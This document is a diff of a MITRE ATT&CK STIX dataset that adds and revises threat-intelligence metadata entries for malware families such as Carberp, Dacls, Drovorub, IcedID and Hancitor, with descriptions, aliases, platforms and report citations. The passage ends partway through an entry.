"x_mitre_platforms": [ + "Linux" + ] + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -220488,6 +244658,50 @@ ], "x_mitre_version": "1.1" }, + { + "created": "2020-07-15T19:48:35.063Z", + "modified": "2020-08-10T21:37:48.548Z", + "labels": [ + "malware" + ], + "type": "malware", + "external_references": [ + { + "external_id": "S0484", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0484" + }, + { + "source_name": "Trend Micro Carberp February 2014", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp", + "description": "Trend Micro. (2014, February 27). CARBERP. Retrieved July 29, 2020." + }, + { + "source_name": "KasperskyCarbanak", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 27, 2017.", + "url": "https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/" + }, + { + "source_name": "RSA Carbanak November 2017", + "url": "https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf", + "description": "RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)", + "name": "Carberp", + "id": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Carberp" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "external_references": [ { @@ -220996,6 +245210,40 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0492", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0492" + }, + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "CookieMiner", + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)", + "id": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-22T01:50:12.660Z", + "created": "2020-07-22T19:00:00.779Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "CookieMiner" + ], + "x_mitre_platforms": [ + "macOS" + ] + }, { "id": "malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -221146,6 +245394,40 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0498", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0498" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)", + "name": "Cryptoistic", + "id": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-08-18T15:36:30.748Z", + "created": "2020-08-10T14:26:12.369Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Cryptoistic" + ], + "x_mitre_platforms": [ + "macOS" + ] + }, { "id": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -221222,6 +245504,47 @@ ], "x_mitre_version": "1.2" }, + { + "external_references": [ + { + "external_id": "S0497", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0497" + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)", + "name": "Dacls", + "id": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-09-02T18:48:58.442Z", + "created": "2020-08-07T14:53:56.534Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Dacls" + ], + "x_mitre_platforms": [ + "macOS", + "Linux", + "Windows" + ] + }, { "id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547", "name": "DarkComet", @@ -221692,6 +246015,40 @@ "Windows" ] }, + { + "external_references": [ + { + "external_id": "S0502", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0502" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Drovorub", + "description": "[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)", + "id": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-09-18T20:55:03.153Z", + "created": "2020-08-25T18:05:14.953Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Drovorub" + ], + "x_mitre_platforms": [ + "Linux" + ] + }, { "created": "2017-05-31T21:32:31.188Z", "modified": "2020-03-30T02:07:19.052Z", @@ -221866,13 +246223,6 @@ "x_mitre_version": "1.1" }, { - "id": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51", - "name": "Ebury", - "description": "[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "external_id": "S0377", @@ -221894,21 +246244,28 @@ "description": "Cimpanu, C.. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019." } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)", + "name": "Ebury", + "id": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51", "type": "malware", "labels": [ "malware" ], - "modified": "2020-03-28T00:54:00.807Z", + "modified": "2020-10-21T18:25:38.692Z", "created": "2019-04-19T16:40:24.922Z", - "x_mitre_platforms": [ - "Linux" + "x_mitre_contributors": [ + "Marc-Etienne M.L\u00e9veill\u00e9, ESET" ], + "x_mitre_version": "1.2", "x_mitre_aliases": [ "Ebury" ], - "x_mitre_version": "1.1", - "x_mitre_contributors": [ - "Marc-Etienne M.L\u00e9veill\u00e9, ESET" + "x_mitre_platforms": [ + "Linux" ] }, { @@ -222088,18 +246445,18 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Emotet", - "description": "[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)", + "description": "[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)", "id": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023", "type": "malware", "labels": [ "malware" ], - "modified": "2020-07-15T13:03:45.812Z", + "modified": "2020-08-13T15:23:35.947Z", "created": "2019-03-25T18:35:14.353Z", "x_mitre_contributors": [ "Omkar Gudhate" ], - "x_mitre_version": "1.2", + "x_mitre_version": "1.3", "x_mitre_aliases": [ "Emotet", "Geodo" @@ -222152,10 +246509,10 @@ "labels": [ "malware" ], - "modified": "2020-03-30T02:09:54.540Z", + "modified": "2020-10-26T14:33:46.159Z", "created": "2017-05-31T21:32:58.738Z", "x_mitre_contributors": [ - "Martin Smolar, ESET" + "Martin Smol\u00e1r, ESET" ], "x_mitre_version": "1.3", "x_mitre_aliases": [ @@ -222512,6 +246869,40 @@ "Windows" ] }, + { + "external_references": [ + { + "external_id": "S0512", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0512" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "FatDuke", + "description": "[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)", + "id": "malware--54a01db0-9fab-4d5f-8209-53cef8425f4a", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-09T16:08:00.074Z", + "created": "2020-09-24T13:23:45.162Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "FatDuke" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -222783,6 +247174,45 @@ "Windows" ] }, + { + "created": "2020-09-08T14:55:46.094Z", + "modified": "2020-10-19T19:44:15.357Z", + "labels": [ + "malware" + ], + "type": "malware", + "id": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)", + "name": "FrameworkPOS", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0503", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0503" + }, + { + "source_name": "Trinity", + "description": "(Citation: SentinelOne FrameworkPOS September 2019)" + }, + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "x_mitre_aliases": [ + "FrameworkPOS", + "Trinity" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ] + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -223081,6 +247511,40 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0493", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0493" + }, + { + "source_name": "Trustwave GoldenSpy June 2020", + "url": "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the \"Intelligent Tax\" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020) ", + "name": "GoldenSpy", + "id": "malware--b9704a7d-feef-4af9-8898-5280f1686326", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-08-19T16:31:40.508Z", + "created": "2020-07-23T13:50:10.409Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "GoldenSpy" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad", "description": "[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)", @@ -223645,6 +248109,50 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0499", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0499" + }, + { + "source_name": "Chanitor", + "description": "(Citation: FireEye Hancitor)" + }, + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + }, + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hancitor", + "description": "[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "id": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-16T00:41:06.476Z", + "created": "2020-08-12T19:32:56.301Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Hancitor", + "Chanitor" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--eff1a885-6f90-42a1-901f-eef6e7a1905e", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -223721,12 +248229,6 @@ "x_mitre_version": "1.1" }, { - "created": "2019-06-24T12:04:32.323Z", - "modified": "2020-03-26T20:35:27.505Z", - "labels": [ - "malware" - ], - "type": "malware", "external_references": [ { "external_id": "S0394", @@ -223747,9 +248249,15 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statistically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)", + "description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)", "name": "HiddenWasp", "id": "malware--fc774af4-533b-4724-96d2-ac1026316794", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-07-31T18:01:53.826Z", + "created": "2019-06-24T12:04:32.323Z", "x_mitre_version": "1.1", "x_mitre_aliases": [ "HiddenWasp" @@ -224011,6 +248519,45 @@ ], "x_mitre_version": "1.1" }, + { + "created": "2020-07-15T17:55:11.252Z", + "modified": "2020-08-14T14:25:53.721Z", + "labels": [ + "malware" + ], + "type": "malware", + "id": "malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d", + "description": "[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)", + "name": "IcedID", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0483", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0483" + }, + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." + }, + { + "source_name": "Juniper IcedID June 2020", + "url": "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware", + "description": "Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020." + } + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "IcedID" + ], + "x_mitre_version": "1.0" + }, { "id": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -224053,7 +248600,7 @@ "id": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "InvisiMole", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by threat actors since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. (Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "external_references": [ { "source_name": "mitre-attack", @@ -224068,6 +248615,11 @@ "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "object_marking_refs": [ @@ -224077,7 +248629,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T02:19:18.750Z", + "modified": "2020-10-21T17:45:34.380Z", "created": "2018-10-17T00:14:20.652Z", "x_mitre_platforms": [ "Windows" @@ -224085,7 +248637,10 @@ "x_mitre_aliases": [ "InvisiMole" ], - "x_mitre_version": "1.1" + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "ESET" + ] }, { "id": "malware--8beac7c2-48d2-4cd9-9b15-6c452f38ac06", @@ -224282,7 +248837,7 @@ "labels": [ "malware" ], - "modified": "2020-03-20T02:18:03.707Z", + "modified": "2020-08-11T19:44:31.363Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_platforms": [ "Windows" @@ -224485,15 +249040,18 @@ "labels": [ "malware" ], - "modified": "2020-04-28T18:32:51.846Z", + "modified": "2020-08-03T19:32:54.607Z", "created": "2019-01-31T00:36:39.771Z", + "x_mitre_contributors": [ + "Doron Karmi, @DoronKarmi" + ], "x_mitre_platforms": [ "Windows" ], "x_mitre_aliases": [ "KONNI" ], - "x_mitre_version": "1.3" + "x_mitre_version": "1.4" }, { "id": "malware--26fed817-e7bf-41f9-829a-9075ffac45c2", @@ -224568,6 +249126,40 @@ ], "x_mitre_version": "1.2" }, + { + "external_references": [ + { + "external_id": "S0487", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0487" + }, + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)", + "name": "Kessel", + "id": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-08-10T19:43:38.144Z", + "created": "2020-07-16T15:14:25.631Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Kessel" + ], + "x_mitre_platforms": [ + "Linux" + ] + }, { "id": "malware--5dd649c0-bca4-488b-bd85-b180474ec62e", "name": "KeyBoy", @@ -225051,6 +249643,13 @@ ] }, { + "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10", + "name": "LoudMiner", + "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "external_id": "S0451", @@ -225063,27 +249662,20 @@ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)", - "name": "LoudMiner", - "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10", "type": "malware", "labels": [ "malware" ], - "modified": "2020-06-29T23:17:50.246Z", + "modified": "2020-09-01T20:55:31.256Z", "created": "2020-05-18T21:01:51.045Z", - "x_mitre_version": "1.0", - "x_mitre_aliases": [ - "LoudMiner" - ], "x_mitre_platforms": [ "macOS", "Windows" - ] + ], + "x_mitre_aliases": [ + "LoudMiner" + ], + "x_mitre_version": "1.1" }, { "id": "malware--251fbae2-78f6-4de7-84f6-194c727a64ad", @@ -225125,45 +249717,6 @@ ], "x_mitre_version": "1.1" }, - { - "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", - "description": "[MAZE](https://attack.mitre.org/software/S0449) ransomware, previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [MAZE](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)", - "name": "MAZE", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "external_references": [ - { - "external_id": "S0449", - "source_name": "mitre-attack", - "url": "https://attack.mitre.org/software/S0449" - }, - { - "source_name": "FireEye Maze May 2020", - "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." - }, - { - "source_name": "McAfee Maze March 2020", - "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", - "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." - } - ], - "type": "malware", - "labels": [ - "malware" - ], - "modified": "2020-06-24T01:40:07.349Z", - "created": "2020-05-18T16:17:59.464Z", - "x_mitre_platforms": [ - "Windows" - ], - "x_mitre_aliases": [ - "MAZE" - ], - "x_mitre_version": "1.0" - }, { "id": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573", "name": "MESSAGETAP", @@ -225293,21 +249846,21 @@ "description": "(Citation: Securelist Machete Aug 2014)" }, { - "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.", + "source_name": "ESET Machete July 2019", "url": "https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf", - "source_name": "ESET Machete July 2019" + "description": "ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019." }, { - "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.", + "source_name": "Securelist Machete Aug 2014", "url": "https://securelist.com/el-machete/66108/", - "source_name": "Securelist Machete Aug 2014" + "description": "Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019." } ], "type": "malware", "labels": [ "malware" ], - "modified": "2020-03-30T02:29:55.300Z", + "modified": "2020-09-22T16:56:50.734Z", "created": "2019-09-13T13:17:25.718Z", "x_mitre_contributors": [ "Matias Nicolas Porolli, ESET" @@ -225318,7 +249871,7 @@ "x_mitre_aliases": [ "Machete" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "id": "malware--1cc934e4-b01d-4543-a011-b988dfc1a458", @@ -225363,6 +249916,54 @@ ], "x_mitre_version": "1.1" }, + { + "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "description": "[Maze](https://attack.mitre.org/software/S0449) ransomware, 